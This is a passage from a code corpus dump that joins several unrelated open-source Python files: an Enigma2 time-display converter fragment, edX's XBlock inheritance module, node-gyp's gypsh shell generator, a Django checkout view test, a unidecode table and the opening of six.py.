                    elif config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
                        try:
                            return sign_r + "%d%% " % ((float(r + 0.0) / float(l + 0.0)) * 100 +1 ) + sign_p + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
                        except:
                            return ""
                    else:
                        try:
                            # NOTE(review): uses p with sign_r — same suspected
                            # bug as the OSD percentage fallback.
                            return sign_r + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
                        except:
                            return ""
                elif self.type == self.TYPE_VFD_REMAINING:
                    test = 0  # dead variable, never read
                    if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
                        try:
                            return sign_p + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
                        except:
                            return ""
                    elif config.usage.swap_time_remaining_on_vfd.value == "2" or config.usage.swap_time_remaining_on_vfd.value == "3": # Elapsed & Remaining
                        return ""
                    else:
                        try:
                            return sign_r + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
                        except:
                            return ""
            else: # Skin Setting
                if not self.detailed:
                    if self.showHours:
                        if self.showNoSeconds:
                            if self.type == self.TYPE_VFD_LENGTH:
                                return sign_l + "%d:%02d" % (l/3600, l%3600/60)
                            elif self.type == self.TYPE_VFD_POSITION:
                                return sign_p + "%d:%02d" % (p/3600, p%3600/60)
                            # NOTE(review): this and several branches below test
                            # TYPE_REMAINING (OSD constant) inside the VFD path;
                            # TYPE_VFD_REMAINING was probably intended — confirm.
                            elif self.type == self.TYPE_REMAINING:
                                return sign_r + "%d:%02d" % (r/3600, r%3600/60)
                        else:
                            if self.type == self.TYPE_VFD_LENGTH:
                                return sign_l + "%d:%02d:%02d" % (l/3600, l%3600/60, l%60)
                            elif self.type == self.TYPE_VFD_POSITION:
                                return sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
                            elif self.type == self.TYPE_REMAINING:
                                return sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
                    else:
                        if self.showNoSeconds:
                            if self.type == self.TYPE_VFD_LENGTH:
                                return ngettext("%d Min", "%d Mins", (l/60)) % (l/60)
                            elif self.type == self.TYPE_VFD_POSITION:
                                return sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
                            elif self.type == self.TYPE_VFD_REMAINING:
                                return sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
                        else:
                            if self.type == self.TYPE_VFD_LENGTH:
                                return sign_l + "%d:%02d" % (l/60, l%60)
                            elif self.type == self.TYPE_VFD_POSITION:
                                return sign_p + "%d:%02d" % (p/60, p%60)
                            elif self.type == self.TYPE_REMAINING:
                                return sign_r + "%d:%02d" % (r/60, r%60)
                else:
                    # Detailed: values are still PTS ticks; show milliseconds.
                    if self.showHours:
                        if self.type == self.TYPE_VFD_LENGTH:
                            return sign_l + "%d:%02d:%02d:%03d" % ((l/3600/90000), (l/90000)%3600/60, (l/90000)%60, (l%90000)/90)
                        elif self.type == self.TYPE_VFD_POSITION:
                            # NOTE(review): sign_r/r for POSITION, sign_p/p for
                            # REMAINING below — looks swapped, as in the OSD path.
                            return sign_r + "%d:%02d:%02d:%03d" % ((r/3600/90000), (r/90000)%3600/60, (r/90000)%60, (r%90000)/90)
                        elif self.type == self.TYPE_REMAINING:
                            return sign_p + "%d:%02d:%02d:%03d" % ((p/3600/90000), (p/90000)%3600/60, (p/90000)%60, (p%90000)/90)
                    else:
                        if self.type == self.TYPE_VFD_LENGTH:
                            return sign_l + "%d:%02d:%03d" % ((l/60/90000), (l/90000)%60, (l%90000)/90)
                        elif self.type == self.TYPE_VFD_POSITION:
                            return sign_p + "%d:%02d:%03d" % ((p/60/90000), (p/90000)%60, (p%90000)/90)
                        elif self.type == self.TYPE_REMAINING:
                            return sign_r + "%d:%02d:%03d" % ((r/60/90000), (r/90000)%60, (r%90000)/90)

    # range/value are for the Progress renderer
    range = 10000

    @cached
    def getValue(self):
        # Progress value scaled to [0, range]; None when length is unknown.
        pos = self.position
        len = self.length
        if pos is None or len is None or len <= 0:
            return None
        return pos * 10000 / len

    position = property(getPosition)
    length = property(getLength)
    cutlist = property(getCutlist)
    text = property(getText)
    value = property(getValue)

    def changed(self, what):
        # Forward poll/cuesheet events downstream; the gauge additionally
        # needs to be told when the cut list changes.
        cutlist_refresh = what[0] != self.CHANGED_SPECIFIC or what[1] in (iPlayableService.evCuesheetChanged,)
        time_refresh = what[0] == self.CHANGED_POLL or what[0] == self.CHANGED_SPECIFIC and what[1] in (iPlayableService.evCuesheetChanged,)
        if cutlist_refresh:
            if self.type == self.TYPE_GAUGE:
                self.downstream_elements.cutlist_changed()
        if time_refresh:
            self.downstream_elements.changed(what)
| gpl-2.0 |
nanolearningllc/edx-platform-cypress | common/lib/xmodule/xmodule/modulestore/inheritance.py | 52 | 13259 | """
Support for inheritance of fields down an XBlock hierarchy.
"""
from __future__ import absolute_import
from datetime import datetime
from pytz import UTC
from xmodule.partitions.partitions import UserPartition
from xblock.fields import Scope, Boolean, String, Float, XBlockMixin, Dict, Integer, List
from xblock.runtime import KeyValueStore, KvsFieldData
from xmodule.fields import Date, Timedelta
from django.conf import settings
# Make '_' a no-op so we can scrape strings
_ = lambda text: text
class UserPartitionList(List):
    """List field whose JSON items (de)serialize as UserPartition objects."""

    def from_json(self, values):
        # Turn each plain JSON dict back into a UserPartition instance.
        return [UserPartition.from_json(value) for value in values]

    def to_json(self, values):
        # Serialize each UserPartition to its JSON-compatible form.
        return [partition.to_json() for partition in values]
class InheritanceMixin(XBlockMixin):
    """Field definitions for inheritable fields.

    Every field declared here (all Scope.settings unless noted) can be set
    on an ancestor block and is inherited by its descendants; see
    compute_inherited_metadata/inherit_metadata below.
    """
    graded = Boolean(
        help="Whether this module contributes to the final course grade",
        scope=Scope.settings,
        default=False,
    )
    start = Date(
        help="Start time when this module is visible",
        # Far-future default keeps content hidden until explicitly scheduled.
        default=datetime(2030, 1, 1, tzinfo=UTC),
        scope=Scope.settings
    )
    due = Date(
        display_name=_("Due Date"),
        help=_("Enter the default date by which problems are due."),
        scope=Scope.settings,
    )
    visible_to_staff_only = Boolean(
        help=_("If true, can be seen only by course staff, regardless of start date."),
        default=False,
        scope=Scope.settings,
    )
    course_edit_method = String(
        display_name=_("Course Editor"),
        help=_("Enter the method by which this course is edited (\"XML\" or \"Studio\")."),
        default="Studio",
        scope=Scope.settings,
        deprecated=True  # Deprecated because user would not change away from Studio within Studio.
    )
    giturl = String(
        display_name=_("GIT URL"),
        help=_("Enter the URL for the course data GIT repository."),
        scope=Scope.settings
    )
    xqa_key = String(
        display_name=_("XQA Key"),
        help=_("This setting is not currently supported."), scope=Scope.settings,
        deprecated=True
    )
    annotation_storage_url = String(
        help=_("Enter the location of the annotation storage server. The textannotation, videoannotation, and imageannotation advanced modules require this setting."),
        scope=Scope.settings,
        default="http://your_annotation_storage.com",
        display_name=_("URL for Annotation Storage")
    )
    annotation_token_secret = String(
        help=_("Enter the secret string for annotation storage. The textannotation, videoannotation, and imageannotation advanced modules require this string."),
        scope=Scope.settings,
        default="xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
        display_name=_("Secret Token String for Annotation")
    )
    graceperiod = Timedelta(
        help="Amount of time after the due date that submissions will be accepted",
        scope=Scope.settings,
    )
    group_access = Dict(
        help=_("Enter the ids for the content groups this problem belongs to."),
        scope=Scope.settings,
    )
    showanswer = String(
        display_name=_("Show Answer"),
        help=_(
            'Specify when the Show Answer button appears for each problem. '
            'Valid values are "always", "answered", "attempted", "closed", '
            '"finished", "past_due", "correct_or_past_due", and "never".'
        ),
        scope=Scope.settings,
        default="finished",
    )
    rerandomize = String(
        display_name=_("Randomization"),
        help=_(
            'Specify the default for how often variable values in a problem are randomized. '
            'This setting should be set to \"never\" unless you plan to provide a Python '
            'script to identify and randomize values in most of the problems in your course. '
            'Valid values are \"always\", \"onreset\", \"never\", and \"per_student\".'
        ),
        scope=Scope.settings,
        default="never",
    )
    days_early_for_beta = Float(
        display_name=_("Days Early for Beta Users"),
        help=_("Enter the number of days before the start date that beta users can access the course."),
        scope=Scope.settings,
        default=None,
    )
    static_asset_path = String(
        display_name=_("Static Asset Path"),
        help=_("Enter the path to use for files on the Files & Uploads page. This value overrides the Studio default, c4x://."),
        scope=Scope.settings,
        default='',
    )
    text_customization = Dict(
        display_name=_("Text Customization"),
        help=_("Enter string customization substitutions for particular locations."),
        scope=Scope.settings,
    )
    use_latex_compiler = Boolean(
        display_name=_("Enable LaTeX Compiler"),
        help=_("Enter true or false. If true, you can use the LaTeX templates for HTML components and advanced Problem components."),
        default=False,
        scope=Scope.settings
    )
    max_attempts = Integer(
        display_name=_("Maximum Attempts"),
        help=_("Enter the maximum number of times a student can try to answer problems. By default, Maximum Attempts is set to null, meaning that students have an unlimited number of attempts for problems. You can override this course-wide setting for individual problems. However, if the course-wide setting is a specific number, you cannot set the Maximum Attempts for individual problems to unlimited."),
        values={"min": 0}, scope=Scope.settings
    )
    matlab_api_key = String(
        display_name=_("Matlab API key"),
        help=_("Enter the API key provided by MathWorks for accessing the MATLAB Hosted Service. "
               "This key is granted for exclusive use in this course for the specified duration. "
               "Do not share the API key with other courses. Notify MathWorks immediately "
               "if you believe the key is exposed or compromised. To obtain a key for your course, "
               "or to report an issue, please contact moocsupport@mathworks.com"),
        scope=Scope.settings
    )
    # This is should be scoped to content, but since it's defined in the policy
    # file, it is currently scoped to settings.
    user_partitions = UserPartitionList(
        display_name=_("Group Configurations"),
        help=_("Enter the configurations that govern how students are grouped together."),
        default=[],
        scope=Scope.settings
    )
    video_speed_optimizations = Boolean(
        display_name=_("Enable video caching system"),
        help=_("Enter true or false. If true, video caching will be used for HTML5 videos."),
        default=True,
        scope=Scope.settings
    )
    video_bumper = Dict(
        display_name=_("Video Pre-Roll"),
        help=_(
            """Identify a video, 5-10 seconds in length, to play before course videos. Enter the video ID from"""
            """ the Video Uploads page and one or more transcript files in the following format:"""
            """ {"video_id": "ID", "transcripts": {"language": "/static/filename.srt"}}."""
            """ For example, an entry for a video with two transcripts looks like this:"""
            """ {"video_id": "77cef264-d6f5-4cf2-ad9d-0178ab8c77be","""
            """ "transcripts": {"en": "/static/DemoX-D01_1.srt", "uk": "/static/DemoX-D01_1_uk.srt"}}"""
        ),
        scope=Scope.settings
    )
    # Site-wide default for the reset button, read from Django settings if present.
    reset_key = "DEFAULT_SHOW_RESET_BUTTON"
    default_reset_button = getattr(settings, reset_key) if hasattr(settings, reset_key) else False
    show_reset_button = Boolean(
        display_name=_("Show Reset Button for Problems"),
        help=_("Enter true or false. If true, problems in the course default to always displaying a 'Reset' button. You can "
               "override this in each problem's settings. All existing problems are affected when this course-wide setting is changed."),
        scope=Scope.settings,
        default=default_reset_button
    )
    edxnotes = Boolean(
        display_name=_("Enable Student Notes"),
        help=_("Enter true or false. If true, students can use the Student Notes feature."),
        default=False,
        scope=Scope.settings
    )
    edxnotes_visibility = Boolean(
        display_name="Student Notes Visibility",
        help=_("Indicates whether Student Notes are visible in the course. "
               "Students can also show or hide their notes in the courseware."),
        default=True,
        # Per-user state, not a course setting.
        scope=Scope.user_info
    )
    in_entrance_exam = Boolean(
        display_name=_("Tag this module as part of an Entrance Exam section"),
        help=_("Enter true or false. If true, answer submissions for problem modules will be "
               "considered in the Entrance Exam scoring/gating algorithm."),
        scope=Scope.settings,
        default=False
    )
def compute_inherited_metadata(descriptor):
    """Recursively propagate inheritable metadata from `descriptor` to all
    of its descendants.  Call this on a CourseDescriptor after importing a
    course.
    NOTE: there is no lazy loading here -- every child in the tree is
    touched."""
    if not descriptor.has_children:
        return
    # Start from what this descriptor inherited, then overlay any fields it
    # sets explicitly (inherited_settings values are json representations).
    parent_metadata = descriptor.xblock_kvs.inherited_settings.copy()
    for field in InheritanceMixin.fields.values():
        if field.is_set_on(descriptor):
            parent_metadata[field.name] = field.read_json(descriptor)
    for child in descriptor.get_children():
        inherit_metadata(child, parent_metadata)
        compute_inherited_metadata(child)
def inherit_metadata(descriptor, inherited_data):
    """
    Push `inherited_data` (a dict mapping field names to the json values
    they should inherit) onto the descriptor's key-value store so that
    inheritable settings resolve from it.
    Descriptors whose kvs cannot hold inherited settings (e.g. error
    modules) are silently skipped.
    """
    try:
        setattr(descriptor.xblock_kvs, 'inherited_settings', inherited_data)
    except AttributeError:
        # The kvs doesn't support inherited_settings, probably because this
        # is an error module; nothing to inherit onto.
        pass
def own_metadata(module):
    """
    Return a JSON-friendly dictionary of only the fields explicitly set on
    `module` (inherited values are excluded), keyed by field name.
    """
    explicitly_set = module.get_explicitly_set_fields_by_scope(Scope.settings)
    return explicitly_set
class InheritingFieldData(KvsFieldData):
    """A ``FieldData`` implementation that resolves unset inheritable fields
    by walking up the content tree to the nearest ancestor that sets them."""

    def __init__(self, inheritable_names, **kwargs):
        """
        `inheritable_names`: iterable of field names that may be inherited
        from parents.
        """
        super(InheritingFieldData, self).__init__(**kwargs)
        self.inheritable_names = set(inheritable_names)

    def default(self, block, name):
        """
        The default for an inheritable name is found on a parent.
        """
        if name not in self.inheritable_names:
            return super(InheritingFieldData, self).default(block, name)
        # Use the field object from the current block (not the tree root):
        # if it declares a different default than the root node's field,
        # the block's own default must win.
        field = block.fields[name]
        ancestor = block.get_parent()
        while ancestor is not None:
            if field.is_set_on(ancestor):
                return field.read_json(ancestor)
            ancestor = ancestor.get_parent()
        return super(InheritingFieldData, self).default(block, name)
def inheriting_field_data(kvs):
    """Create an InheritingFieldData that inherits the names in InheritanceMixin."""
    # All fields declared on InheritanceMixin are considered inheritable.
    return InheritingFieldData(
        inheritable_names=InheritanceMixin.fields.keys(),
        kvs=kvs,
    )
class InheritanceKeyValueStore(KeyValueStore):
    """
    Common superclass for kvs's which know about inheritance of settings. Offers simple
    dict-based storage of fields and lookup of inherited values.
    Note: inherited_settings is a dict of key to json values (internal xblock field repr)
    """
    def __init__(self, initial_values=None, inherited_settings=None):
        super(InheritanceKeyValueStore, self).__init__()
        # Values inherited from ancestors; consulted only by default().
        self.inherited_settings = inherited_settings or {}
        # Explicitly-set field values, keyed by field name.
        self._fields = initial_values or {}
    def get(self, key):
        # Raises KeyError if the field was never explicitly set.
        return self._fields[key.field_name]
    def set(self, key, value):
        # xml backed courses are read-only, but they do have some computed fields
        self._fields[key.field_name] = value
    def delete(self, key):
        # Raises KeyError if the field was never explicitly set.
        del self._fields[key.field_name]
    def has(self, key):
        return key.field_name in self._fields
    def default(self, key):
        """
        Check to see if the default should be from inheritance. If not
        inheriting, this will raise KeyError which will cause the caller to use
        the field's global default.
        """
        return self.inherited_settings[key.field_name]
| agpl-3.0 |
boyers/hamlit | node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/generator/gypsh.py | 2779 | 1665 | # Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""gypsh output module
gypsh is a GYP shell. It's not really a generator per se. All it does is
fire up an interactive Python session with a few local variables set to the
variables passed to the generator. Like gypd, it's intended as a debugging
aid, to facilitate the exploration of .gyp structures after being processed
by the input module.
The expected usage is "gyp -f gypsh -D OS=desired_os".
"""
import code
import sys
# All of this stuff about generator variables was lovingly ripped from gypd.py.
# That module has a much better description of what's going on and why.
_generator_identity_variables = [
    'EXECUTABLE_PREFIX',
    'EXECUTABLE_SUFFIX',
    'INTERMEDIATE_DIR',
    'PRODUCT_DIR',
    'RULE_INPUT_ROOT',
    'RULE_INPUT_DIRNAME',
    'RULE_INPUT_EXT',
    'RULE_INPUT_NAME',
    'RULE_INPUT_PATH',
    'SHARED_INTERMEDIATE_DIR',
]

# Each identity variable expands back to itself, e.g. 'PRODUCT_DIR' maps to
# '<(PRODUCT_DIR)', so processed .gyp data keeps the references intact.
generator_default_variables = {
    v: '<(%s)' % v for v in _generator_identity_variables
}
def GenerateOutput(target_list, target_dicts, data, params):
  """Drop into an interactive Python shell with the processed gyp data bound
  to local variables, instead of writing any build files (debugging aid)."""
  # Don't shadow the `locals` builtin -- the original code did, which makes
  # the builtin unusable inside this function.
  shell_locals = {
      'target_list': target_list,
      'target_dicts': target_dicts,
      'data': data,
  }
  # Use a banner that looks like the stock Python one and like what
  # code.interact uses by default, but tack on something to indicate what
  # locals are available, and identify gypsh.
  banner = 'Python %s on %s\nlocals.keys() = %s\ngypsh' % \
           (sys.version, sys.platform, repr(sorted(shell_locals.keys())))
  code.interact(banner, local=shell_locals)
| mit |
libretees/libreshop | libreshop/orders/tests/test_ConfirmationView.py | 1 | 2648 | from importlib import import_module
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.urlresolvers import reverse
from django.test import TestCase, RequestFactory
from orders.models import Order, Purchase, Transaction
from products.models import Product, Variant
from ..views import UUID
class ConfirmationViewTest(TestCase):
    '''
    Exercise the checkout ConfirmationView's behavior around the Order Token
    stored in session variables.
    '''

    def setUp(self):
        '''
        Create common test assets prior to each individual unit test run.
        '''
        # Set up test data.
        self.product = Product.objects.create(name='foo', sku='123')
        self.variant = Variant.objects.create(
            product=self.product, name='bar', sub_sku='456'
        )
        self.order = Order.objects.create()
        self.purchase = Purchase.objects.create(
            order=self.order, variant=self.variant
        )
        self.transaction = Transaction.objects.create(
            order=self.order, transaction_id='foo'
        )
        # Put Order Token within session variable.
        session = self.client.session
        session.update({
            UUID: {
                'order_token': self.order.token
            }
        })
        session.save()
        self.view_url = reverse('checkout:confirmation')

    def test_view_returns_200_status_if_no_order_token_is_in_session_variables(self):
        '''
        Test that the ConfirmationView returns a 200 OK status if there is no
        Order Token within session variables.
        '''
        session = self.client.session
        del session[UUID]['order_token']
        session.save()
        # Perform test.  (The original bound `response.content.decode()` to an
        # unused local; it has been removed.)
        response = self.client.get(self.view_url)
        self.assertEqual(response.status_code, 200)

    def test_view_returns_200_status_if_order_token_is_in_session_variables(self):
        '''
        Test that the ConfirmationView returns a 200 OK status if an Order Token
        is present within session variables.
        '''
        # Perform test.
        response = self.client.get(self.view_url)
        self.assertEqual(response.status_code, 200)

    def test_view_redirects_on_successful_post(self):
        '''
        Test that the ConfirmationView returns a 302 Found (Temporary Redirect)
        status if valid Form data is POSTed to the View's OrderReceiptForm.
        '''
        # Set up HTTP POST request.
        request_data = {'email_address': 'test@example.com'}
        # Perform test.
        response = self.client.post(self.view_url, data=request_data, follow=False)
        self.assertRedirects(response, self.view_url)
| gpl-3.0 |
Hellowlol/plexpy | lib/unidecode/x073.py | 252 | 4646 | data = (
'Sha ', # 0x00
'Li ', # 0x01
'Han ', # 0x02
'Xian ', # 0x03
'Jing ', # 0x04
'Pai ', # 0x05
'Fei ', # 0x06
'Yao ', # 0x07
'Ba ', # 0x08
'Qi ', # 0x09
'Ni ', # 0x0a
'Biao ', # 0x0b
'Yin ', # 0x0c
'Lai ', # 0x0d
'Xi ', # 0x0e
'Jian ', # 0x0f
'Qiang ', # 0x10
'Kun ', # 0x11
'Yan ', # 0x12
'Guo ', # 0x13
'Zong ', # 0x14
'Mi ', # 0x15
'Chang ', # 0x16
'Yi ', # 0x17
'Zhi ', # 0x18
'Zheng ', # 0x19
'Ya ', # 0x1a
'Meng ', # 0x1b
'Cai ', # 0x1c
'Cu ', # 0x1d
'She ', # 0x1e
'Kari ', # 0x1f
'Cen ', # 0x20
'Luo ', # 0x21
'Hu ', # 0x22
'Zong ', # 0x23
'Ji ', # 0x24
'Wei ', # 0x25
'Feng ', # 0x26
'Wo ', # 0x27
'Yuan ', # 0x28
'Xing ', # 0x29
'Zhu ', # 0x2a
'Mao ', # 0x2b
'Wei ', # 0x2c
'Yuan ', # 0x2d
'Xian ', # 0x2e
'Tuan ', # 0x2f
'Ya ', # 0x30
'Nao ', # 0x31
'Xie ', # 0x32
'Jia ', # 0x33
'Hou ', # 0x34
'Bian ', # 0x35
'You ', # 0x36
'You ', # 0x37
'Mei ', # 0x38
'Zha ', # 0x39
'Yao ', # 0x3a
'Sun ', # 0x3b
'Bo ', # 0x3c
'Ming ', # 0x3d
'Hua ', # 0x3e
'Yuan ', # 0x3f
'Sou ', # 0x40
'Ma ', # 0x41
'Yuan ', # 0x42
'Dai ', # 0x43
'Yu ', # 0x44
'Shi ', # 0x45
'Hao ', # 0x46
'[?] ', # 0x47
'Yi ', # 0x48
'Zhen ', # 0x49
'Chuang ', # 0x4a
'Hao ', # 0x4b
'Man ', # 0x4c
'Jing ', # 0x4d
'Jiang ', # 0x4e
'Mu ', # 0x4f
'Zhang ', # 0x50
'Chan ', # 0x51
'Ao ', # 0x52
'Ao ', # 0x53
'Hao ', # 0x54
'Cui ', # 0x55
'Fen ', # 0x56
'Jue ', # 0x57
'Bi ', # 0x58
'Bi ', # 0x59
'Huang ', # 0x5a
'Pu ', # 0x5b
'Lin ', # 0x5c
'Yu ', # 0x5d
'Tong ', # 0x5e
'Yao ', # 0x5f
'Liao ', # 0x60
'Shuo ', # 0x61
'Xiao ', # 0x62
'Swu ', # 0x63
'Ton ', # 0x64
'Xi ', # 0x65
'Ge ', # 0x66
'Juan ', # 0x67
'Du ', # 0x68
'Hui ', # 0x69
'Kuai ', # 0x6a
'Xian ', # 0x6b
'Xie ', # 0x6c
'Ta ', # 0x6d
'Xian ', # 0x6e
'Xun ', # 0x6f
'Ning ', # 0x70
'Pin ', # 0x71
'Huo ', # 0x72
'Nou ', # 0x73
'Meng ', # 0x74
'Lie ', # 0x75
'Nao ', # 0x76
'Guang ', # 0x77
'Shou ', # 0x78
'Lu ', # 0x79
'Ta ', # 0x7a
'Xian ', # 0x7b
'Mi ', # 0x7c
'Rang ', # 0x7d
'Huan ', # 0x7e
'Nao ', # 0x7f
'Luo ', # 0x80
'Xian ', # 0x81
'Qi ', # 0x82
'Jue ', # 0x83
'Xuan ', # 0x84
'Miao ', # 0x85
'Zi ', # 0x86
'Lu ', # 0x87
'Lu ', # 0x88
'Yu ', # 0x89
'Su ', # 0x8a
'Wang ', # 0x8b
'Qiu ', # 0x8c
'Ga ', # 0x8d
'Ding ', # 0x8e
'Le ', # 0x8f
'Ba ', # 0x90
'Ji ', # 0x91
'Hong ', # 0x92
'Di ', # 0x93
'Quan ', # 0x94
'Gan ', # 0x95
'Jiu ', # 0x96
'Yu ', # 0x97
'Ji ', # 0x98
'Yu ', # 0x99
'Yang ', # 0x9a
'Ma ', # 0x9b
'Gong ', # 0x9c
'Wu ', # 0x9d
'Fu ', # 0x9e
'Wen ', # 0x9f
'Jie ', # 0xa0
'Ya ', # 0xa1
'Fen ', # 0xa2
'Bian ', # 0xa3
'Beng ', # 0xa4
'Yue ', # 0xa5
'Jue ', # 0xa6
'Yun ', # 0xa7
'Jue ', # 0xa8
'Wan ', # 0xa9
'Jian ', # 0xaa
'Mei ', # 0xab
'Dan ', # 0xac
'Pi ', # 0xad
'Wei ', # 0xae
'Huan ', # 0xaf
'Xian ', # 0xb0
'Qiang ', # 0xb1
'Ling ', # 0xb2
'Dai ', # 0xb3
'Yi ', # 0xb4
'An ', # 0xb5
'Ping ', # 0xb6
'Dian ', # 0xb7
'Fu ', # 0xb8
'Xuan ', # 0xb9
'Xi ', # 0xba
'Bo ', # 0xbb
'Ci ', # 0xbc
'Gou ', # 0xbd
'Jia ', # 0xbe
'Shao ', # 0xbf
'Po ', # 0xc0
'Ci ', # 0xc1
'Ke ', # 0xc2
'Ran ', # 0xc3
'Sheng ', # 0xc4
'Shen ', # 0xc5
'Yi ', # 0xc6
'Zu ', # 0xc7
'Jia ', # 0xc8
'Min ', # 0xc9
'Shan ', # 0xca
'Liu ', # 0xcb
'Bi ', # 0xcc
'Zhen ', # 0xcd
'Zhen ', # 0xce
'Jue ', # 0xcf
'Fa ', # 0xd0
'Long ', # 0xd1
'Jin ', # 0xd2
'Jiao ', # 0xd3
'Jian ', # 0xd4
'Li ', # 0xd5
'Guang ', # 0xd6
'Xian ', # 0xd7
'Zhou ', # 0xd8
'Gong ', # 0xd9
'Yan ', # 0xda
'Xiu ', # 0xdb
'Yang ', # 0xdc
'Xu ', # 0xdd
'Luo ', # 0xde
'Su ', # 0xdf
'Zhu ', # 0xe0
'Qin ', # 0xe1
'Ken ', # 0xe2
'Xun ', # 0xe3
'Bao ', # 0xe4
'Er ', # 0xe5
'Xiang ', # 0xe6
'Yao ', # 0xe7
'Xia ', # 0xe8
'Heng ', # 0xe9
'Gui ', # 0xea
'Chong ', # 0xeb
'Xu ', # 0xec
'Ban ', # 0xed
'Pei ', # 0xee
'[?] ', # 0xef
'Dang ', # 0xf0
'Ei ', # 0xf1
'Hun ', # 0xf2
'Wen ', # 0xf3
'E ', # 0xf4
'Cheng ', # 0xf5
'Ti ', # 0xf6
'Wu ', # 0xf7
'Wu ', # 0xf8
'Cheng ', # 0xf9
'Jun ', # 0xfa
'Mei ', # 0xfb
'Bei ', # 0xfc
'Ting ', # 0xfd
'Xian ', # 0xfe
'Chuo ', # 0xff
)
| gpl-3.0 |
pv/scikit-learn | sklearn/externals/six.py | 547 | 20588 | """Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2013 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import operator
import sys
import types
__author__ = "Benjamin Peterson <benjamin@python.org>"
__version__ = "1.4.1"
# Useful for very coarse version differentiation.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
# Aliases for the text/number/class types whose names differ between py2 and
# py3, so client code can test against one portable name.
if PY3:
    string_types = str,
    integer_types = int,
    class_types = type,
    text_type = str
    binary_type = bytes
    MAXSIZE = sys.maxsize
else:
    string_types = basestring,
    integer_types = (int, long)
    class_types = (type, types.ClassType)
    text_type = unicode
    binary_type = str
    if sys.platform.startswith("java"):
        # Jython always uses 32 bits.
        MAXSIZE = int((1 << 31) - 1)
    else:
        # It's possible to have sizeof(long) != sizeof(Py_ssize_t).
        # Probe the platform: len() raises OverflowError when __len__
        # returns a value larger than Py_ssize_t can hold.
        class X(object):
            def __len__(self):
                return 1 << 31
        try:
            len(X())
        except OverflowError:
            # 32-bit
            MAXSIZE = int((1 << 31) - 1)
        else:
            # 64-bit
            MAXSIZE = int((1 << 63) - 1)
        del X
def _add_doc(func, docstring):
    """Install *docstring* as the documentation of *func*."""
    func.__doc__ = docstring
def _import_module(name):
    """Import a dotted module path and return the module after the last dot."""
    __import__(name)
    module = sys.modules[name]
    return module
class _LazyDescr(object):
    """Descriptor that resolves a moved object on first attribute access."""

    def __init__(self, name):
        self.name = name

    def __get__(self, instance, owner):
        value = self._resolve()
        setattr(instance, self.name, value)
        # Once the resolved value is cached on the instance, drop the
        # descriptor from the class so later lookups bypass it entirely.
        delattr(owner, self.name)
        return value
class MovedModule(_LazyDescr):
    """Lazy reference to a module that was renamed between py2 and py3."""

    def __init__(self, name, old, new=None):
        super(MovedModule, self).__init__(name)
        if PY3:
            # Default the py3 name to the move's own name when not given.
            self.mod = name if new is None else new
        else:
            self.mod = old

    def _resolve(self):
        return _import_module(self.mod)
class MovedAttribute(_LazyDescr):
    """Lazy reference to a module attribute that moved between py2 and py3."""

    def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
        super(MovedAttribute, self).__init__(name)
        if PY3:
            if new_mod is None:
                new_mod = name
            self.mod = new_mod
            # The py3 attribute defaults to the py2 one, which itself
            # defaults to the move's own name.
            if new_attr is None:
                new_attr = name if old_attr is None else old_attr
            self.attr = new_attr
        else:
            self.mod = old_mod
            self.attr = name if old_attr is None else old_attr

    def _resolve(self):
        module = _import_module(self.mod)
        return getattr(module, self.attr)
class _MovedItems(types.ModuleType):
    """Lazy loading of moved objects"""
# Registry of every renamed module/attribute; each entry becomes a lazy
# descriptor on _MovedItems (and therefore an attribute of six.moves).
_moved_attributes = [
    MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
    MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
    MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"),
    MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
    MovedAttribute("map", "itertools", "builtins", "imap", "map"),
    MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"),
    MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
    MovedAttribute("reduce", "__builtin__", "functools"),
    MovedAttribute("StringIO", "StringIO", "io"),
    MovedAttribute("UserString", "UserString", "collections"),
    MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
    MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
    MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"),
    MovedModule("builtins", "__builtin__"),
    MovedModule("configparser", "ConfigParser"),
    MovedModule("copyreg", "copy_reg"),
    MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
    MovedModule("http_cookies", "Cookie", "http.cookies"),
